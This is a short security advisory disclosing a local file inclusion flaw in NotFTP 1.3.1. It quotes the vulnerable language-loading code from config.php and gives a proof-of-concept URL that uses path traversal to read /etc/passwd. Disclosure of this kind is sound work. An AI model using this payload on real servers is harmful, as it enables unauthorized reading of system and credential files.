NotFTP 1.3.1 (newlang) Local File Inclusion Vulnerability

2009.04.26
Credit: Kacper
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

NotFTP 1.3.1 => Local file include http://sourceforge.net/projects/notftp/ Author: Kacper Email: kacper1964@yahoo.pl Home: http://devilteam.pl/ DC++ Hub address: bluber-hub.no-ip.biz:2008 Vuln: File config.php: ######################################################################### # This is where we decide what language to use. Don't mess with this # either. ######################################################################### if (isset($newlang)) { require_once("lib/lang/".$languages[$newlang]["file"]); } elseif (isset($_COOKIE["notftplang"])) { require_once("lib/lang/".$languages[$_COOKIE["notftplang"]]["file"]); } else { require_once("lib/lang/".$languages[DEFAULTLANG]["file"]); } # NotFTP version. Changing this would be silly. So don't. PoC: http://site.pl/path/config.php?newlang=kacper&languages[kacper][file]=../../../../../etc/passwd The End =========


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top